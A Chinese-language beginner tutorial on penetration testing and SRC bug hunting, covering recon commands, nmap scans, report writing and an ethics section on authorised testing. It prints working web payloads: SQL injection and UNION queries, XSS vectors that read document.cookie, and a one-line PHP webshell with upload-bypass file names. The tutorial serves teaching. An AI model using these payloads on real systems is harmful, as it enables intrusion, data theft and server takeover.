渗透测试与SRC漏洞挖掘基础教程

1. 渗透测试基础概念

渗透测试(Penetration Testing)是通过模拟恶意攻击者的方法，评估系统安全性的过程。SRC(Security Response Center)则是企业设立的漏洞收集与响应平台。

1.1 渗透测试类型

•黑盒测试：无任何内部信息

•白盒测试：拥有完整内部信息

•灰盒测试：部分内部信息

1.2 渗透测试流程

1.信息收集

2.漏洞扫描

3.漏洞利用

4.权限维持

5.痕迹清除

6.报告撰写

2. 信息收集技术

2.1 基础信息收集

bash

# WHOIS查询

whois example.com

# DNS信息查询

dig example.com ANY

nslookup -type=any example.com

# 子域名枚举

subfinder -d example.com

amass enum -d example.com

2.2 网络扫描

bash

# Nmap基础扫描

nmap -sS -sV -O -T4 example.com

# 全端口扫描

nmap -p- -T4 example.com

# 漏洞脚本扫描

nmap --script vuln example.com

3. Web应用漏洞测试

3.1 SQL注入

sql

# 基础检测

' OR 1=1 --

" OR 1=1 --

') OR 1=1 --

# 联合查询注入

' UNION SELECT 1,2,3,4,5--

' UNION SELECT database(),user(),version(),4,5--

3.2 XSS漏洞

html

# 基础XSS测试

<script>alert(1)</script>

<img src=x onerror=alert(1)>

# DOM型XSS

#"><img src=x onerror=alert(1)>

javascript:alert(document.cookie)

3.3 文件上传漏洞

bash

# 尝试上传webshell

<?php system($_GET['cmd']); ?>

# 绕过技巧

shell.php.jpg

shell.php%00.jpg

shell.pHp

4. 常见SRC漏洞类型

4.1 OWASP Top 10漏洞

1.注入

2.失效的身份认证

3.敏感数据泄露

4.XML外部实体(XXE)

5.失效的访问控制

6.安全配置错误

7.跨站脚本(XSS)

8.不安全的反序列化

9.使用含有已知漏洞的组件

10.不足的日志记录和监控

4.2 业务逻辑漏洞

•越权访问

•验证码绕过

•短信/邮箱轰炸

•订单金额篡改

•优惠券滥用

5. 漏洞报告编写

5.1 报告基本结构

1.漏洞标题

2.漏洞等级

3.漏洞URL

4.漏洞描述

5.复现步骤

6.修复建议

7.证明截图/POC

5.2 漏洞等级参考

•高危：直接获取服务器权限、严重数据泄露

•中危：敏感信息泄露、一般越权

•低危：反射型XSS、信息泄露

6. 法律与道德规范

1.仅测试授权目标

2.不进行破坏性测试

3.不泄露发现的漏洞

4.遵守各SRC平台规则

5.不测试未授权的第三方系统

7. 常用工具清单

工具类型工具名称

信息收集Nmap, Amass, Subfinder, theHarvester

Web扫描Burp Suite, OWASP ZAP, Nikto

漏洞利用Metasploit, SQLmap, XSStrike

密码破解Hashcat, John the Ripper

代理工具Proxychains, FoxyProxy

综合框架Kali Linux, Parrot OS

请记住：渗透测试必须获得合法授权，未经授权的测试可能构成违法行为。